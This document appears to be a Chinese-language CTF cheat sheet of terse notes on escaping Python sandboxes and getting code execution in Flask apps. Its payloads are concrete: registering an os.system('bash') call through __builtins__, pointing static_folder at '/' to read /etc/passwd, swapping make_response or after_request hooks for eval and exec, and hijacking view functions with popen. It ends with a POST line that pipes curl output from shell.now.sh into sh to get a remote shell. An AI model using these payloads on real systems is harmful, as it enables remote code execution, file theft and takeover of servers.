python内置函数
文档
__import__()用来导入模块,并可以直接返回模块对象,也就是说可以直接调用函数
open()可以打开文件,可以open().read()直接读文件,也可以next(open())读取文件的第一行
eval()、exec()是主要执行命令的函数
__builtins__包含内置类型、内置函数和内置常量,必要时可以新增数据,如__builtins__.xXXxXXx='__import__("os").system("bash")'可以注册常量
python沙箱
python沙箱逃逸一些套路的小结
https://ctf-wiki.github.io/ctf-wiki/pwn/linux/sandbox/python-sandbox-escape-zh/
flask
app/Flask
flask项目通常这样开始
from flask import Flask
app = Flask(__name__)
flask对象实现WSGI应用程序并充当中心对象。它传递了应用程序的模块或软件包的名称。创建后,它将充当视图功能,URL规则,模板配置等的中央注册表。
static_folder带有静态文件的文件夹,应在static_url_path提供。默认为应用程序根路径中的文件夹static
也就是说,可以app.static_folder='/'的方法将静态文件目录设为根目录,可以访问/static/etc/passwdmake_response将视图函数的返回值转换为response_class的实例
会在return的时候自动对返回内容调用,这意味着可以app.make_response=evalafter_request_funcs包含每个请求后应调用的函数列表的字典,键值对于所有request均为None
app.after_request_funcs[None]=[exec]
PS:先调用make_response处理返回值,再调用after_request_funcsview_functions所有已注册视图函数的字典。键是也用于生成url的函数名,值是函数对象本身。
可以劫持路由,配合匿名函数直接rce
匿名函数也可以劫持内置函数来bypassapp.view_functions['index'] = lambda: __import__('os').popen('id').read()__builtins__.ord=lambda*args:45
request
request对象是Request子类的一个实例,提供了Werkzeug定义的所有属性。
headers获取header,可以用来bypass
劫持函数
劫持werkzeug.urls.url_parse为eval后,就可以利用url rce
POST __import__('os').system('curl${IFS}https://shell.now.sh/8.8.8.8:1003|sh') HTTP/1.1